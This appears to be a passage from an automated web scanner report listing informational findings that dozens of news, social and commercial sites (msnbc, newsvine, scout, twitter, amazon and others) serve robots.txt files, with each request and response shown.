The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: planetary.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 08 Oct 2010 19:21:19 GMT
ETag: "c6aafa-fb-ea46e9c0"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_img/
Disallow: /_error/
Disallow: /_inc/
Disallow: /archive/
Disallow: /audio/
Disallow: /cgi-bin/
Disallow: /html/
Disallow: /image/
Disallow: /Images/
Disallow: /images/
Di
...[SNIP]...

29.61. http://preps.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://preps.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: preps.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://preps.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:50 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.62. http://profootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profootball.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://profootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:58 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.63. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Summary

Severity:   Information
Confidence:   Certain
Host:   http://progolftalk.nbcsports.com
Path:   /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: progolftalk.nbcsports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:18:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Content-Length: 506
X-nc: HIT luv 45

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...

29.64. http://r1.ace.advertising.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1.ace.advertising.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:12 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

29.65. http://rachel.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rachel.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:13 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.66. http://redtape.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: redtape.msnbc.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web048
X-Webserver: oak-tp-web048
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 02:18:21 GMT
X-Varnish: 2959024747 2869871228
Age: 90920
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.67. http://redtape.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: redtape.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a8d6b693822a4f1e8b11eb055446adcb; expires=Sat, 25-Jan-2031 02:18:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:18:24 GMT
Content-Length: 247
Keep-Alive: timeout=3, max=947
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://redtap
...[SNIP]...

29.68. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rss.scout.com

Response

HTTP/1.0 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://rss.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:d04"
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:29 GMT
Connection: close
Akamai: True

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.69. http://s0.2mdn.net/879366/flashwrite_1_2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /879366/flashwrite_1_2.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 21:20:10 GMT
Expires: Wed, 26 Jan 2011 21:07:44 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 17904
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

29.70. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sat, 29 Jan 2011 23:14:08 GMT
Expires: Sat, 29 Jan 2011 23:14:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.71. http://science.slashdot.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://science.slashdot.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: science.slashdot.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001
X-Fry: That's a chick show. I prefer programs of the genre: World's Blankiest Blank.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Last-Modified: Sat, 29 Jan 2011 20:32:12 GMT
ETag: "15f42f-503-4d44794c"
Content-Type: text/plain
Content-Length: 1283
Date: Sun, 30 Jan 2011 02:18:52 GMT
X-Varnish: 958563512
Age: 0
Connection: close

# robots.txt for Slashdot.org
# $Id$
# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Mediapartners
...[SNIP]...

29.72. https://secure.scout.com/js/oo_engine.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /js/oo_engine.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: https://secure.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:8ea"
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:40 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.73. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: security.live.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sun, 23 Jan 2011 07:23:01 GMT
Accept-Ranges: bytes
ETag: "80f8cd5dcebacb1:4835"
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
Date: Sat, 29 Jan 2011 23:13:44 GMT
Connection: close

User-agent: *
Disallow:

29.74. http://seedmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seedmagazine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: seedmagazine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 05 May 2009 19:13:49 GMT
ETag: "2e80a8-26-14221540"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/print

29.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:24:12 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

29.76. http://suzanne-choney.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: suzanne-choney.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3d9913b9eddb878e863d4c9ab7933aac; expires=Sat, 25-Jan-2031 02:19:30 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:19:30 GMT
Content-Length: 254
Keep-Alive: timeout=3, max=970
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://suzann
...[SNIP]...

29.77. http://technolog2.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: technolog2.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:44 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=e466e09e433a4d1e1987318c36645d33; expires=Sat, 25-Jan-2031 02:53:44 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:53:44 GMT
Content-Length: 250
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://techno
...[SNIP]...

29.78. http://thelastword.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thelastword.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 03:00:28 GMT
Date: Sun, 30 Jan 2011 02:55:28 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://thelas
...[SNIP]...

29.79. http://today.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:40 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.80. http://toddkenreck.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toddkenreck.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:53 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d5a3adb258afdc4a1c6ae1e727ff7f15; expires=Sat, 25-Jan-2031 02:57:53 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:57:53 GMT
Content-Length: 251
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://toddke
...[SNIP]...

29.81. http://top.newsvine.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /users

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: top.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:30 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=24fe27669d7d307f2e7b9fc3ebbf1971; expires=Sat, 25-Jan-2031 02:58:30 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:58:30 GMT
Content-Length: 243
Keep-Alive: timeout=3, max=990
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://top.ne
...[SNIP]...

29.82. http://trueslant.com/milesobrien/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trueslant.com
Path:   /milesobrien/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trueslant.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:18 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Last-Modified: Wed, 15 Jul 2009 22:03:04 GMT
ETag: "6cc614-150-46ec5b826b600"
Accept-Ranges: bytes
Content-Length: 336
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSSESSID=ts-www6; path=/

sitemap: http://trueslant.com/sitemap.xml
User-agent: *
Allow: /
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes

User-agent: Mediapartners-Google
Allow: /

User-agent: Adsbot-Google
All
...[SNIP]...

29.83. http://tv.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:32 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.84. https://twitter.com/ToddKenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:03:17 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296356597186309; path=/; expires=Sun, 06-Feb-11 03:03:17 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:26:54 GMT
Accept-Ranges: bytes
Content-Length: 489
Cache-Control: max-age=86400
Expires: Mon, 31 Jan 2011 03:03:17 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Robot
User-Agent: Slurp
Crawl-de
...[SNIP]...

29.85. http://wbenedetti.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wbenedetti.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:15 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0da504898b08190fdbac0d27b1a3e796; expires=Sat, 25-Jan-2031 03:05:15 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 03:05:15 GMT
Content-Length: 250
Keep-Alive: timeout=3, max=997
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://wbened
...[SNIP]...

29.86. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webreflection.blogspot.com
Path:   /2007/08/global-scope-evaluation-and-dom.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webreflection.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Sun, 30 Jan 2011 01:51:56 GMT
Date: Sun, 30 Jan 2011 01:51:56 GMT
Last-Modified: Sat, 29 Jan 2011 16:51:37 GMT
ETag: "68641a2f-a995-496b-a3b0-3a35d5667c34"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search

Sitemap: http://webreflection.blogspot.com/feeds/posts/default?orderby=updated

29.87. http://widgets.digg.com/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 30 Jan 2011 01:52:04 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=291 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 31 Jan 2011 01:52:03 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

29.88. http://www.adobe.com/cfusion/knowledgebase/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /cfusion/knowledgebase/index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:16 GMT
ETag: "501-fb4f1300"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 29 Jan 2011 22:41:08 GMT
Content-Type: text/plain
Connection: close
Date: Sun, 30 Jan 2011 01:52:12 GMT
Age: 249
Content-Length: 1281

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

29.89. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:31 GMT
Server: Server
Last-Modified: Thu, 23 Sep 2010 18:50:15 GMT
ETag: "7c0-bb8de7c0"
Accept-Ranges: bytes
Content-Length: 1984
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in
Disallow: /exec/obid
...[SNIP]...

29.90. http://www.batstrading.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.batstrading.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.batstrading.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 18 Aug 2009 12:52:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 144
Date: Sun, 30 Jan 2011 01:52:16 GMT
Age: 0
Connection: close
X-BATS: 1112151768

User-agent: twiceler
Disallow: /

User-agent: *
Disallow:
Disallow: /_cache/
Disallow: /_css/
Disallow: /_img/
Disallow: /_js/
Disallow: /book/

29.91. http://www.briefing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.briefing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.briefing.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/plain
Last-Modified: Thu, 15 Feb 2007 01:33:46 GMT
Accept-Ranges: bytes
ETag: "a0662b56a150c71:45"
Server: Briefing Content Server
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:26 GMT
Connection: close

User-agent: *
Disallow: /aspnet_client
Disallow: /Benchmark
Disallow: /ErrorPages
Disallow: /Gold
Disallow: /images
Disallow: /Platinum
Disallow: /Silver
Disallow: /Trader
Disallow: /wpresour
...[SNIP]...

29.92. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dabagirls.com
Path:   /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dabagirls.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:52:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.93. http://www.dailygrail.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailygrail.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2408231434"
Last-Modified: Thu, 25 Mar 2010 12:09:22 GMT
Content-Length: 1672
Connection: close
Date: Sun, 30 Jan 2011 03:05:35 GMT
Server: lighttpd

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.94. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Tue, 24 Aug 2010 23:16:46 GMT
ETag: "67b2ba1-636-48e99f573f380"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Sun, 13 Feb 2011 01:52:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
